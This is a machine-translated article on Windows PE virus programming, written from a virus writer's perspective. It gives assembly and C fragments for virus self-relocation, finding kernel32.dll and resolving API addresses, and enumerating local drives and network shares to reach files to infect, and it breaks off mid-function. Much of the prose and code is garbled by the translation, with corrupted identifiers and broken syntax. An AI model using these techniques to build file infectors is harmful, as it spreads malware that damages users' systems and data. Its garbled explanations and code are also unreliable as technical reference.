Viral programming technology

xiaoxiao2021-04-01  221

Life is in the Internet, whether it is a programmer or as a general computer user, it is no longer unfamiliar. The network is more than just the fast channel of communication, from another perspective, it is also a virus to spread and breed, and there is a data display. The Windows operating system that does not install the patch is connected to the Internet. 10-15 minutes will be worm or Viral infection. Various types of viruses are quietly spread at people through the network, exchange files, and listen to the video. These viruses or worms consume a large amount of bandwidth resources during the propagation process, but also interfere with the normal use of the system function or cause data loss, even hardware damage, each computer user has almost all systematically infected with viral infection and cannot be used normally Experience, most of the enterprise users have experienced the experience of the business system to run normally due to viral attacks. The virus is not far from us. However, not only ordinary users feel fascinating and fear after facing various exaggerated reports and publicity, with the segmentation and specialization of the computer, even some professional programmers lack in-depth understanding. Virus, but a well-designed process is a centralized reflection of programming skills and optimization techniques, which is a challenge technology limit and a programming technology that is omnipotent. In fact, the optimization and variety of exquisite structures in the virus technology can be used in some special situations, making some programming operations simplify; from another perspective, only fully understand the viral technology can better research The strategy of dealing, knowing oneself and knowing each other, it will be worth war. Virus is not a special product under a system, in fact, various popular operating systems: from the initial UNIX system to its various variants such as Linux, Solaris, AIX, OS2, etc., from Windows to CE, Sybian and other embedded The system, even in some specialized large machine systems, there is no exception to the virus, the basic principle of viruses under various platforms is similar, but the characteristics of different systems may differ, the reason is As a technique that is omnipotent, it is bound to take advantage of various system-related functions or weaknesses to achieve various privileges and resources. As the diversity of organisms, there are many variety of viruses: including source code viruses, macro viruses, script viruses, and viruses associated with various systems executable file systems. This article will use the PE virus under the most extensive Windows operating system as an example to indicate the principles of viral technology and the implementation of technology, and disperse the fog in the virus technology. * Virus, worms, malicious code traditional viruses are special code or procedures with similar biological viral features, with two most basic features: self-replication and automatic transmission. Worm, generally considered a subclass of viruses, which also have self-replication and propagation characteristics, but in view of the particularity of the worm usually use system vulnerabilities rather than infected file systems, it is usually used as a class. It is generally believed that the classification standard for worms and traditional viruses is to see if they rely on the host program to perform infection and dissemination. If the host program can be attached to the host program, it is a virus. However, the definition is not absolute, and the integration of today's viruses and worm technology is more and more, the boundaries are more embarrassed. Many viruses use a lot of worm propagation techniques, and worms are not only spread through system vulnerability, but also spread through infected file systems. In addition, there is a considerable part of the program that does not have the characteristics of self-replication and self-propagation, but it has implemented unison's licensed code, which did not have user-permitted things, such as Spyware and other spyware, browsers, and browser malicious scripts. Some advertising software, etc., it is clear that it is unable to define it as a traditional virus or worm, and they are like a worm, the virus, and belong to a larger category - malicious code. This paper focuses on the technology of traditional viruses. * Virus briefly talks about viral technology and cannot avoid the history of viruses.

As early as 1949, in a "complex automatic device theory and organization of the complex automatic device" in 1949, it was foreseen that the possible self-propagation procedures appeared. Nowadays, the sprouting of the virus in the AT & T (Bell Lab) several young genius programmers prepared by the Corewar game program, which has some characteristics of the virus. Subsequently related experiments and research began to start in the programmers of some scholars and geniuses, which is these geniuses that have created computer systems and have created computer viruses. It is difficult to test the first real virus when and where, but in the 1980s, with the popularity of the personal computer, the virus has begun to popular, and the early computer virus is and the document exchange method and operating system at the time. The feature links together, then the release software or exchange file is mainly made by the floppy disk, the system is based on UNIX or DOS, the network has not been popular, so the virus during this period is mostly guided the zone virus and document virus, the former The replacement system boot area code acquires the execution at the system start, the latter is embedded by modifying the executable to obtain control at the executable, and more viruses is the combination of the two. The popularity of IBM-PC and the popularity of MS DOS systems have gradually occupied DOS viruses at this stage. In the late 1980s, the Internet began to enter people's field of view. At this time, the first Internet worm-Morris worm has emerged, rapidly spread through the network with the system vulnerability. With the further popularization of computers and networks, virus technology has also been greatly improved, which is largely due to the degree of viruses and the progress of anti-virus software, and further stimulates the creation of viral producer groups. Desire, polymorphism and deformation techniques begin to appear to scan against anti-anti-anti-virus software. The absolute quantity of the DOS operating system virus has exploded growth, but with the emergence of Windows in the late 1990s, the DOS virus and guiding area virus gradually went to die, and the Windows virus came in a lot of emergence, with the popularity of Microsoft Office software. Macro virus A variety of script viruses are also increasing. The popularity of the Internet has also contributed to the speed and scope of viral spread, and the worms spread by Emai began to increase, and it is still an important spread path of worms today. Since 2000, in the first few years of entering the 21st century, PE virus technology under Windows has become increasingly sure, but the number is increasing, but the first place in the virus list has enlained worms that use various system vulnerabilities to spread the worm, safety The research is in-depth, a large number of security vulnerabilities provide a good material to the worm, and the number of malware such as Trojan has a geometric level, and the viral author's attention is re-emerged from the Windows desktop system to the UNIX system. Embedding on mobile devices. Safety research is also more interest in social concern, the wars of viruses and anti-viruses continue, and will continue in the foreseeable future. However, the Windows PE file virus still has a very large proportion. Windows platform and PE file format

The Windows platform is the most popular desktop system today, which also has considerable share on the server market. Its executable (ordinary user program, shared library, and driver file for NT system) use PE (Portable Executebale) file format. Virus To complete various operations, it is generally performed by calling the API provided by the Windows system to ensure that the readers can be familiar with the basic APIs. The virus must be infected with the host program, which inevitably want to modify the PE file, so the reader is required to have a certain understanding of the PE file format. The PE file format is a complex file format. This article is not prepared to tell the PE file format. It is only necessary to introduce it to the need, if necessary, please refer to the relevant information [1] [2] [3]. The format of the PE file structure and head partial domain is shown in Figure 1 below. As can be seen from Figure 1, the PE file is composed of a file header, a section table, a section containing various code and data. The import function table of the PE file is defined in the file header, the importance of function table, number of questions, file versions, file size, subsystems, etc. related. The knock is defined in the size, alignment, memory to how the file is mapped to the file. The subsequent sections contain actual executable code or data. Figure 1 Definition of PE file structure and partial domain

* PE virus technology analysis

A typical PE virus modifies the PE file, writes the viral code into the PE file file, updates the head-related data structure, so that the modified PE file is still legal PE file, then change the PE entry pointer to the virus code entry In this way, after the system is loaded, the virus code first acquires control. After performing infection or destroying the code, the control is transferred to the normal program code, so that the virus code is unknone to quietly run . The processes of PE files after dye are generally shown in Figure 2:

Figure 2 Execution process after dyed

This is just the most common execution process. In fact, with the progress of anti-virus technology, more viruses are not controlled by the entrance of the program, but to obtain control in the program run or exit, to escape anti-virus software Preliminary scanning, this technology is also known as EPO technology, will be described in the second half of this article. The virus code is generally divided into several major functional modules: decoding module, relocation module, file search module, infection module, destruction module, encrypted deformed module, etc., different viruses include modules, such as decoding, encrypted deformation, etc. But the file search and infection modules are almost every PE virus, because self-replication I am spreading the most basic feature of the virus. Some viruses may also achieve other modules, such as email, network scan, memory infection, etc. A typical PE virus code execution process is roughly as shown in Figure 3:

Figure 3 A typical virus code implementation process

It is very simple to see the virus in principle, but there are many difficulties in achieving these technical difficulties. In fact, if these technical difficulties are solved, a five organizational virus is formed, and will be given from the perspective of a virus writer in this article. Introduce. The techniques that the virus can use almost all aspects of the Windows program design, but limited to space, this article is not described, this article will focus on the technologies commonly used by Win32 user mode viruses.

* Any language programming language is strong enough to write PE viruses. However, most of the PE viruses are directly prepared to use assembly. On the one hand, because the compilation compiled code is short, it can be fully optimized to meet the requirements of concealment; on the other hand, the use of compilation is because of its Flexible and controllable, the virus should be more even hardware to deal with the system under the system. Since the compiler is characterized, some functions are more troublesome, such as using compilation, it can be directly repositioned directly. , Self-code modification and reading and writing IO ports, while high-level language implementation is relatively cumbersome. With assembly, you can fully utilize the various characteristics supported by the underlying hardware, which is very small. However, the main disadvantage of writing viruses with assembly is to write efficiency, plus various optimization means makes the code reading quite difficult, but as an extreme programming technology, these seems no longer important. This article assumes that the reader is familiar with the assembly language. Various examples use the assembly code of the Intel format, the compiler can compile using MASM or FASM, because the assembly language is more inconvenient, so the algorithm and principical representation still use C language. When talking about various techniques, some code is taken from the source code of virus Elkern, which has been popular in 2002, which is included in the 7th issue of the famous virus magazine 29a, and interested readers can refer to it complete code. . * reset

The relocation of the virus itself is the most basic problem that the virus code should be resolved before running smoothly. The virus code also needs to reference some data, such as the name of the API function, the blacklist of anti-virus software, the system-related special data, etc., due to the memory address of the virus code in the host process, the memory address is not available when compiling assembly code. Predict, and viruses are also unable to predict in advance when infected with different hosts, the virus is to dynamically determine the address of its reference data at runtime, otherwise, it will be almost certainly errors when referenced data. For ordinary PE files such as dynamic link libraries, the loader is dynamically corrected by a particular structure called a relocation table according to a special structure called a relocation table in PE, and the relocation table is The compiler is generated during the compile stage, so the dynamic link library itself does not need to do any additional processing for this. Different virus codes, must dynamically determine the address of the data that needs to be referenced. For example, a virus code is loaded at 0x400000, and a statement at address 0x401000 and its referenced data definitions are as follows, and the related address is calculated when compiler is compiled. It is assumed that the preset base address is also 0x400000: 401000: MOV EAX, DWORD PTR [402035] ... 402035: DB "Hello World!", 0 If the virus code is also loaded into the base 0x400000 in the host, it is obviously possible, but if this paragraph The code is loaded at the base address 0x500000 running error, and this is a case where the virus is mostly encountered because the reference is still 0x402035. If the virus code is not running in a host process but is run as a stand-alone PE file with a relocation table, the system loader is modified by the system loader according to the redistribution table entry to modify the 0x402035 in the DWORD PTR [402035]. Value 0x502305, this code has become MOV EAX, DWORD PTR [5402035], and the program can run accurately. However, it is a pity, and for the operation of virus codes within other processes, additional means must be taken, and the additional cost of infection is set in time, otherwise the host process will not function properly.

There are at least two ways to solve the problem of relocation:

A) The first method is to construct a corresponding relocation entry using the particular role of the above PE file relocation entry. When infected with the target PE file, the address of the need to be repositioned to the target PE file will be referred to in the relocation table of the target PE file. If the target PE does not have any relocation entries (such as using MS Linker / fixed), create Relocate the table and insert a new repositioning item; if there is already a repositioning entry, you have modified the existing relocation table, where the new entry containing these addresses is inserted. The relocation work is completely automated by the system loading device when loading the PE file. The relocation table item is directed by the sixth member_erge_basereelocococoC in the DataDirectory data of the PE file header. The code required by this method is slightly more, and it is relatively complicated. In addition, if the target file has no re-positioning entry (in order to reduce the volume volume, this situation is not uncommon), it is more troublesome, only the high-level language is written. The virus is often used in this approach, which is rarely used in the general PE virus. B) Dynamically obtain the runtime address of the current command using the Intel X86 architecture of special instructions, call or fnstenv, etc., calculate the difference between the address and the predefined address of the predefined address (called Delta Offset), and then the difference Added to the original address, it is the correct address of the runtime data. For Intel X86 instruction sets, when writing code, by placing the Delta Offset in a register, then the data relocation can be resolved by addressing the data. Also described, if the above instruction block is mapped in 0x500000, then the code and its address in memory will become: 501000: MOV Eax, DWORD PTR [402035] ... 502035: DB "Hello World! ", 0

Obviously, the operand address referenced by the MOV command is incorrect. If we know that the MOV instruction runtime address is 0x501000, then calculate the difference of the preset address when the address and compile: 0x501000-0X401000 = 0x100000. Obviously, the actual data address referenced by the instruction should be 0x402035 0x100000 = 0x502035. As can be seen from the previous example, as long as you can determine the address of the dynamic runtime at runtime, the compile time is known, we can correctly relocate any code or data by adding Delta Offset to the appropriate address. Runtime address. The principle is shown in Figure 4:

Figure 4 Delta Iffset

Usually, as long as the Delta Offset is calculated at the beginning of the virus code, the assembly code of the reference data is written by the address address, that is, the virus code can be guaranteed to be properly relocated at runtime. Suppose the EBP contains Delta Offset. Use the following address instructions to ensure that the data address referenced at runtime is correct:; EBP contains delta offset value 401000: MOV EAX, DWORD PTR [EBP 0x402035] ... ... 402035: DB "Hello World!", 0 When writing the source program, symbols can be used instead of hard-encoded address values, which are given in the above examples to replace the symbols to replace the symbols. Now the problem is converted to how to get the value of Delta Offset, obviously: Call deltadelta: POP EBP SUB EBP, OFFSET DELTA dynamically calculates the Delta Offset value during runtime, because Call wants to subsequent the first instruction The address is pressed into the stack. Therefore, the POP EBP is executed in the EBP is the runtime address of Delta, subtracting the Delta's compile time, "Offset Delta" is obtained by the value of Delta Offset. In addition to using obvious CALL instructions, you can use the floating point environment saving instructions such as fstenv, fsave, fxsave, fstenv, which can also get the runtime address of a certain instruction. Take FNStenv as an example, the instruction saves the information of the association-executed FPU instructions in the specified memory in the specified memory, as shown in Figure 5: Figure 5 Structure of the floating point environment block

This structure offset 12 byte is the runtime address of the final execution floating point command, so we can also use the following instruction to acquire Delta Offset: FPU_ADDR: FNOP Call GetPhaddr Sub EBP, FPU_ADDR

GetPhaddr: Sub ESP, 16 FNSTENV [ESP-12] POP ​​EBP Add ESP, 12 RET

Delta Offset does not necessarily be placed in EBP, but EBP does not use the register as a stack frame pointer, so that most viral authors are used to saving delta offset in EBP, actually used Other registers are also available. In the optimized virus code, it is not often used directly to directly calculate the Delta Offset code. For example, the following code is written in the beginning of Elkern: call _start_ip_start_ip: pop ebp; ...; use call [ebp addrocess-_start_ip] ; ... addropenprocess DD 0; instead of call _start_ip_start_ip: pop ebp sub ebp, _start_ip call [ebp addropenprocess]

Why not use the second way to write code? The reason is that although the first format is more commendable when writing the source code, addRopenProcess-_start_ip is a smaller relative offset value, generally not more than two bytes, so the generated instruction is short, and AddropenProcess is 32 Win32 In the compilation environment, it is generally 4 bytes of address values, and the generated instructions are longer. Sometimes the requirements for viruses are demanding, but also to show its supermarher programming skills, the viral author uses this optimization, and readers interested in this optimization principle, please refer to the instruction format of the intel manual volume 2. Acquisition

After you can relocate properly, the virus can run your own code. But this is far from enough, to search for files, read and write files, processes the process enumeration and other operations that cannot be fully re-implemented in the case of Win32 API, which is too large and compatible. difference. All Win9X / NT / 2000 / XP / 2003 systems achieve the same set of Win32 APIs highly compatible on various versions, so the Win32 API provided by the calling system implements various functions to viruses. So the question to be solved is how to dynamically get the address of the Win32 API. The earliest PE virus uses a precoding method. For example, the address of CreateFilea in Windows 2000 is 0x7ee63260, then call the API using Call [7ee63260H] in the virus code, but the problem is the address between the API between the different Windows versions. Not exactly the same, the virus using this method may only run on a version of Windows 2000. Therefore, the viral author naturally returns to the PE structure to explore the solution. We know that when the system loads the PE file, the runtime address of the function in the specific DLL introduced is in the introduction function table of the PE, how is the system The PE introduction table fills in the correct function address? The answer is that the system resolution introduces the export function table of the DLL, then searches the RVA (relative virtual address) of the corresponding lead function according to the name or serial number, and then add the API function to the actual loading address in memory. Runtime real address. In the process of studying how the operating system implements dynamic PE file links, the viral author found the following two solutions:

A) When infecting the PE file, you can search the associated address of the host's function introduction table. If the function to be used has been introduced, the call to the API points to the introduction table function address, if not introduced, then modify The introduction table increases the introduction entry of this function and will point to the API to the newly added introduction function address. In this way, when the host program is started, the system loader has filled the correct API function address, and the virus code can correctly call the function directly.

B) The system can resolve the DLL export table, and the natural virus can also obtain the required API address from the DLL through this means. To resolve the export table of the search DLL at runtime, you must first get the real loading address of the DLL in memory, only in this way, to resolve the location of the export table from the header information from the PE. Which DLL should be resolved first? We know that kernel32.dll is almost loaded in all Win32 processes, which contains most commonly used APIs, especially the LoadLibrary and GetProcAddress two APIs can get any of the functions exported in any DLL, in the so far This is true on all Windows platforms. Just get the base address that kernel32.dll loaded in the process, then parse the Kernel32.dll's export table to get the commonly used API address, if you need to further use LoadLibrary and getProcaddress in kernel32.dll, two APIs are easier to get any other The address of the function is exported to the DLL and call.

* Get a way to get the kernel32.dll base address to get the Kernel32.dll base address, the most common is the search method, if the rough address loaded by kernel32.dll is known, then the address can be searched by this address to the high address or low address. Find its base address. Another method is to search for the module list in the NT PEB structure to get the exact loading base of kernel32.dll. Let's take a look at the specific implementation code:

Method 1: Violence Search Get the base address of kernel32.dll

The initial virus is a general load address, such as the loading address under 9x in 9X; loading the base address under Windows 2000; loading the base address under XP and 2003 is 0x77E60000, so under the NT system You can start searching from 0x77E00000 to high address search, and you can start searching to high address from 0xBff00000 from 0xBFF00000, if you search for the load address of kernel32.dll, its head must be a "MZ" flag, start offset by the module 0x3c The double word determined PE header is inevitably the "PE" flag, so it can be determined whether the module load address is found according to the two signs, maybe someone thinks that this method is unreliable, because if there is a certain number of data in line with these two characteristics Then, the base address of the found may be wrong, but experimentally, the judgment method is very reliable, and there will be no errors. One thing to note is that the loading base address of kernel32.dll under all versions of Windows system is aligned according to 0x10000. According to this feature, you can do not have to search by byte, and you can search according to the boundary address of the 64K alignment. Searching from the rough address starting search KERNEL32.DLL base address may appear to read and write to the unmapped memory area, therefore needs to be used with SEH. If there is a general method of accurately acquiring the address of the address in Kernel32.dll in each version, you can more reliably start from the address to low address searches, obviously more common. In fact, this method exists. When the system loads the PE file jumps to the first instruction of the PE entry point, the top of the stack is saved in the kernel32.dll, and this method is used in Elkern: _Start: Pushfd; if Some Flags, ESPECIAL DF, CHANGED, Some Apis Can Crash Down !!! Pushad_Start_ @ 1 EQU $; ... MOV EBX, [ESP 9 * 4]; 9 double word and ebx in front of Pushfd and Pushad 0FFE00000H; this address is an address below the kernel32.dll module; first subtract 0x100000 to ensure that the address is below Kernel32.dll; to the high address search If the release of Windows is kernel32.dll; size and code structure Change, this method may be invalid

EBX is now a KERNEL32.DLL base address before, follow-up code can search for its base address to the high address. This method has a disadvantage that it must be clearly known that the stack pointer value of the program entry, or indirectly calculates the value, which is possible for those virus codes that acquire control of the program entry, but for viruses using EPO technology. In terms of this method, this method is not applicable. In fact, there is another generous way, we know that the base address of the FS segment register is always directed to the TEB of the process during the execution of the Win32 program, and the first member of the TEB points to the SEH linked list, each node is EXCEPTION_REGISTRATION a structure which is defined as follows: struct EXCEPTION_REGISTRATION {struct EXCEPTION_REGISTRATION * prev; void * handler;}; Windows sEH list at the last point to the starting address of the handler member function UnhandledExceptionFilter Kernel32.DLL in the use of this feature of our You can write more common code: XOR ESI, ESI LODS DWORD [FS: ESI]; get the head pointer of the SEH linked list @@: inc Eax; is it the last SEH node, check if the prev is 0xfffffffff JE @f dec energy ESI, EAX LODSD; Next SEH Node Jmp Near @B @@: Lodsd; getting the address of UnhandlexceptionFilter in kernel32.dll in the 0x7ffde000 as a pointer value of the TEB, why is in Windows 2003 SP1, Windows XP SP2 The previous NT system is fixed, which can indeed save one or two bytes. However, in Windows 2003 SP1, Windows XP SP2, the situation has changed. For security considerations, the Windows system starts to dynamically map TEB, that is, pointing to the pointer value of TEB is no longer fixed, so this hard coding The method will come to the end. At this point, you can search for the low address search until the base address of Kernel32.dll is found in the previous method. Elkern determined whether or not the base address found Kernel32.dll related code is as follows: search_api_addr_ @ 1: add ebx, 10000h jz short search_api_addr_seh_restore cmp word ptr [ebx], 'ZM'; MZ whether the flag jnz short search_api_addr_ @ 1 mov eax, [EBX 3CH] Add Eax, EBX CMP WORD PTR [EAX], 'EP'; whether there is a PE flag jnz short search_api_addr_ @ 1; find the base address of kernel32.dll

Method 2: Search the associated structure of the PEB to get the base address of kernel32.dll

The aforementioned TEB offset 0x30, that is, an important pointer is saved at the fs: [0x30] address, which points to the PEB (Process Environment Block), a lot of PEB members, and the detailed structure of PEB is not described here. We only need to know that the offset 0xc of the PEB structure is saved to save another important pointer LDR, the pointer points to the peb_ldr_data structure: typedef struct _peb_ldr_data {ulong length; // 0x00 Boolean Initialized; // 0x04 pvoid sshandle; // 0x08 LIST_ENTRY InLoadOrderModuleList; // 0x0c LIST_ENTRY InMemoryOrderModuleList; // 0x14 LIST_ENTRY InInitializationOrderModuleList; // 0x1c} PEB_LDR_DATA, * PPEB_LDR_DATA; // 0x24 after three members of the structure is a pointer to a corresponding linked list LDR_MODULE three doubly linked list head The pointer is the pointer of the module information structure arranged in the address order of the memory, respectively, in the loading order, and the module information structure arranged in the initial order.

LDR_MODULE structure is as follows: typedef struct _LDR_MODULE {LIST_ENTRY InLoadOrderModuleList; // 0x00 LIST_ENTRY InMemoryOrderModuleList; // 0x08 LIST_ENTRY InInitializationOrderModuleList; // 0x10 PVOID BaseAddress; // 0x18 PVOID EntryPoint; // 0x1c ULONG SizeOfImage; // 0x20 UNICODE_STRING FullDllName; // 0x24 UNICODE_STRING BaseDllName; // 0x2c ULONG Flags; // 0x34 SHORT LoadCount; // 0x38 SHORT TlsIndex; // 0x3a LIST_ENTRY HashTableEntry; // 0x3c ULONG TimeDateStamp; // 0x44 // 0x48} ldr_module, * pldr_module; peb-> ldr-> inin ItializationOrderModuleList points to the first LDR_Module node of the first LDR_Module node in the initial order, which is in the WinNT platform (not containing Win9x), the LDR_Module structure of the list header node contains information about NTDLL.DLL, and the next one of the linked list The node is included is the information related to kernel32.dll. Is this ADRESS in the Node LDR_Module structure not what we have worked hard? Note that INITIALIZATIONORDERMODULIST is the third member of LDR_Module, so you have to get the address of the baseAddress, just add its pointer to the DEREFRENCE. Therefore, the following assembly code can get the base address of kernel32.dll:

MOV EAX, DWORD PTR FS: [30H]; Get the PEB base MOV EAX, DWORD PTR [EAX 0CH]; get the peb_ldr_data structure pointer MOV ESI, DWORD PTR [EAX 1CH]; get the first LDR_Module node of the INITIALIZATIONORDERMODULELIST linker IninitializationOrderModuleList member's pointer Lodsd; get the two-way linked list of the pointer MOV EBX, DWORD PTR [EAX 08H]; Take the base address, the structure is currently included; kernel32.dll related information This method is in all Windows NT (Including Windows 2003 SP1 and Windows XP SP2) The operating system is valid. The only shortcomings are due to the difference in the PEB structure, which is invalid on the Win9x system. It may be more clear and more clearly listening to a picture:

Figure 6 Process of using the PEB search KERNEL32.DLL base address

Export function table

The function export mechanism of the PE file is an important mechanism for dynamic calls between modules. For normal programs, the relevant operation is automatically completed by the system loader before the program is loaded, and the user program is transparent. However, if you want to implement dynamic parsing of the function address in the virus code to replace the loader, it is necessary to understand the structure of the function export table. 1 can be seen in FIG. DataDirectory array structure comprising a head structure IMAGE_OPTIONAL_HEADER32 PE structure, which structure comprises 16 members, each member is a IMAGE_DATA_DIRECTORY structure: typedef struct _IMAGE_DATA_DIRECTORY {DWORD VirtualAddress; DWORD Size;} IMAGE_DATA_DIRECTORY, * PIMAGE_DATA_DIRECTORY; each structure of the DataDirectory array points to an important data structure, the first member points to the export function table (index 0), the second member points to the introduction function table of the PE file (index 1). The first member points DataDirectory IMAGE_EXPORT_DIRECTORY export function table structure: typedef struct _IMAGE_EXPORT_DIRECTORY {DWORD Characteristics; DWORD TimeDateStamp; WORD MajorVersion; WORD MinorVersion; DWORD Name; DWORD Base; DWORD NumberOfFunctions; DWORD NumberOfNames; DWORD AddressOfFunctions; // RVA from base of image DWORD AddressOfNames; // RVA from base of image DWORD AddressOfNameOrdinals; // RVA from base of image} IMAGE_EXPORT_DIRECTORY, * PIMAGE_EXPORT_DIRECTORY; AddressOfFunctions is a double word, contains all RVA exported function, the other two members are AddressOfNames A double word array contains RVAs that point to the string of the export function name, addressofNameRDinals is a word array (16bit), and the addressOfNames array is parallel, and the addressOfNames array determines the serial number of the corresponding extraction function, which can be used directly The index addressoffunctions array get the address of the export function. Therefore, the virus search specified API contains the following steps:

a) Get the value of NumberOfNames and the address of the array of AddressOfNames, AddressOfNameRINALS, and Addressoffunctions. b) Search for the addressofnames array, compare the corresponding API, if the corresponding API is found, if the NumberOfNames name has not been searched, turn B continues to search, if the search is completed, this step is usually omitted. Because we already know that the corresponding DLL will definitely export the corresponding function. d) The index of the current function name pointer in the addressofNames array, removes the function serial number indexed with this value in the addressOfNameRDINALS array, with the serial number value as an index of the addressoffunctions array, and remove the RVA value of the export function in the addressoffunctions array, plus The base is obtained by running the address of the runtime. It seems that it seems to be more comparable, in fact, this is the sacrifice that PE is designed to consider flexibility. However, it is still relatively simple, usually less than 100 bytes after compiling code. The following is a complete code for getProcaddress in Kernel32:

Push ESI; ESI = VA KERNEL32.BASE; EDI = RVA K32.PEHDR MOV EBP, ESI MOV EDI, [EBP EDI Peh.DataDirectory]

Push EDI ESI

MOV EAX, [EBP EDI peexc.addressofnames] MOV EDX, [EBP EDI peexc.addressofNameordinals] Call @f DB "getProcaddress", 0 @@: Pop Edi Mov ECX, 15 SUB EAX, 4 Next_: Add Eax 4 Add EDI, ECX SUB EDI, 15 MOV ESI, [EBP ESI] Add ESI, EBP MOV ECX, 15 REPZ CMPSB; Specific string comparison, determine if the function to find JNZ next_

POP ESI EDI

Sub Eax, [EBP EDI peexc.addressofnames] SHR EAX, 1 Add Edx, EBP MOVZX EAX, WORD [EDX EBP] Add ESI, [EBP EDI Peexc.Addressoffunctions] Add EBP, [ESI EAX * 4 ]; EBP = kernel32.getProcaddress.addr; Use get ketdress and hModule to get other func pop esi; ESI = kernel32 base When the front parses Export function table acquire the API address, the method of directly comparing the string is not found. The corresponding API can also calculate the HASH of the function name, and then compare the HASH that is compared to Hash, the modern PE virus is more Hash method, the reason is that the general function name is greater than 4 bytes. Using Hash as long as it takes 4 bytes or 2 bytes, it can save space, and there may be a role in antiviral analysis, because Hash is more than the character string name. The design of the HASH algorithm can be used to ensure that there is no conflict, and you can use the CRC and other mature algorithms. The CRC16 algorithm is used in Elkern. * File search

File search is one of the important functional modules of viruses, but also the key to infection and dissemination. Modern Windows and various mobile media file systems may adopt a variety of complex formats, so trying to access file systems directly like some DOS viruses (read and write sectors). Usually use the WIN32 API's FindFirstFile and FindNextFile to realize all directories and files in the current directory, by judging searchable file properties, distinguishing whether or not the directory or executable file, for executable, according to pre-design, infection strategy Infection; for all subdirectories and special .. parent catalogs in the current directory, you can use the two APIs to be traversed by the two APIs using the recursive or non-recursive ways, so any one of the folder from a driver or network. The directory begins, you can traverse all files and directories in the current drive or network sharing folder. Generally, search file starts from the root of the drive or shared folder, so how do you get all drives or all the shared folder lists existing in the current system? For the previous question, we know that Windows can divide a: ~ z: a total of 26 logical panels, so you can start the search from A: Start to add all the drives, use Win32 API GetDriveType to determine if the current search is existing, and It is a fixed hard disk, a removable storage medium, whether it can be written or a network driver. General viruses only infects fixed hard drives or network drivers. Since the assembly language is too lengthy during the expression algorithm, the algorithm part uses C language description, of course, the C algorithm is converted into assembly language is a very simple process. The following code enumdisk.cpp will display the relevant properties of the A-Z drivers:

#include

#include

#DEFINE MAX_DRIVENAME_LENGTH 64VOID __CDECL Main (int Argc, char * argv []) {char drivename [max_drivename_length]; char * p; unsigned int DRV_ATTR;

P = Drivename; STRNCPY (Drivename, "A:", MAX_DRIVENAME_LENGTH); for (; * p <'z'; * p) {DRV_ATTR = GetDriveType (p); switch (drive_unknown: // unknown Type printf ("drive% s type% s / n", p, "drive_unknown"); Break; case drive_no_root_dir: // This drive does not exist printf ("DRIVE% S TYPE% S / N", P, "DRIVE_NO_ROOT_DIR" ); Break; Case Drive_removable: // Movable disk, floppy disk or U disk or mobile hard disk, etc. Printf ("drive_removable"); Break; Case DRIVE_FIXED: / / Fixed Hard Disk Printf ("DRIVE% S TYPE% S / N", P, "Drive_Fixed"); Break; Case Drive_Remote: // Generally a mapping network drive Printf ("Drive% s type% s / n", p, "drive_remote" Break; Case Drive_CDROM: / / CD Printf ("DRIVE% S TYPE% S / N", P, "Drive_CDROM"); Break; Case Drive_ramdisk: // Ram Disk Printf ("Drive% S Type% S / N "P," drive_ramdisk "; Break;}}} is different from that only the information is displayed, and the virus will call the file enumeration function (such as the enum_path function given later) from the current root directory to traverse Drive_fi All files on the Xed drive are file-infected according to a predefined policy. Resources also referred to by tree organization, non-leaf nodes called containers, and the container needs further search until the leaf node is reached, and the leaves node is the root path of shared resources. Shared resources are generally divided into two types: sharing printing devices and shared folders. For the search for the network sharing file, WNETOPENENUM and WNETENUMRESOURCE are recursively enumerated. Its function prototype and parameter meanings See msdn, using the following code enumshare.cpp will display all network drive sharing folders: #include

#include

#pragma comment (lib, "mpr.lib") int enum_netshare (LPNETRESOURCE lpnr); void __cdecl main (int argc, char * argv []) {enum_netshare (0);} int enum_netshare (LPNETRESOURCE lpnr) {DWORD r, rEnum Usage; handle henum; dword cbBuffer = 16384; dword centries = -1; lpnetResource lpnrlocal; // netresource array structure pointer DWORD i; R = WNETOPENENUM (Resource_GlobalNet, // Range: All network resources resourcetype_disk, // Type: Only Enumerate storage media resourceusage_all, // Using status: Null & Henum when all lpnr, // is first called; // Return to the network resource handle if (r! = NO_ERROR) {Printf ("WnetOpenenum error ... ./N "); Return False;} lpnRlocal = (lpNetResource) malloc (cbuffer); if (lpnrlocal == null) Return False; do {zeromeMory (lpnRlocal, cbuffer); Renum = WnertenuResource (HEN UM, & centries, // Return as many results as possible lpnrlocal, // lpnetResource & cluffer; // Buffer size if (renum == no_ERROR) {for (i = 0; i

} Else {// Here the virus can call the traversal function to traverse all files under this shared folder // enum_path (lpnRlocal [i] .lpremotename); Printf ("Find% S ->% S / N", LPNRLOCAL [i ] .lpLocalname, lpnrlocal [i] .lpremotename);}}} else if (renum! = error_no_more_items) {Printf ("WneetenumResource Error ... / N"); Break;}} while (Renum! = Error_NO_MORE_ITEMS); Free ((void *) lpnrlocal; r = wnetcloseenum (henum); if (r! = no_ERROR) {Printf ("WnetCloseenum error .... / n"); return false;} Return true;} Traversing start WNETOPENENUM 4 Conversion is 0, and when the shared container is discovered, the parameter will be the NetResource structural pointer of the shared container. From the NetResource structure, we can find LPREMOTENAME we are interested in 0 indicates a valid shared container or shared folder.

typedef struct _NETRESOURCE {DWORD dwScope; DWORD dwType; DWORD dwDisplayType; DWORD dwUsage; LPTSTR lpLocalName; LPTSTR lpRemoteName; LPTSTR lpComment; LPTSTR lpProvider;} NETRESOURCE;

After solving the problem of the start directory, you can start using FindFirstFile and FINDNEXTFILE from these starting directories to start all files and directories under their subdirectories, and the traversal method can adopt depth priority or breadth priority search algorithm. More commonly used or depth priority algorithms. The specific implementation can be implemented in two implementations of recursion search or non-recurable search. Recursive search needs to occupy the stack space, it is possible to make the stack space depletion to produce an exception, but in real application, this situation rarely occurs, not such problems, but the code implementation is slightly complex. In realistic applications, the most useful to recursively traverse search. When searching, you can specify the first reference to *. * To search all files, determine if the DWFileAttributes member of the search results win32_find_data structure determines whether it is a directory. If you are a directory, you need to continue traversing the subdirectory, according to Win32_find_data's cfilename File name members determine if there is a file suffix to be infected to take a modification of the infection action, the following code implements the function of recursive search for a directory and all subdirectory:

Void enum_path (char * cpath) {

Win32_find_data wfd; handle hfd; char cdir [max_path]; char subdir [MAX_PATH];

Int r;

GetCurrentDirectory; setCurrentDirectory (CPATH); HFD = FINDFIRSTFILE ("*. *", & Wfd);

IF (HFD! = INVALID_HANDLE_VALUE) {DO {if (wfd.dwfileAttributes & file_attribute_directory) {if (wfd.cfilename [0]! = '.') {// Synthetic full path name Sprintf (Subdir, "% s //% S ", cpath, wfd.cfilename); // Recursive enumeration subdirectory ENUM_PATH (SUBDIR);}} else {

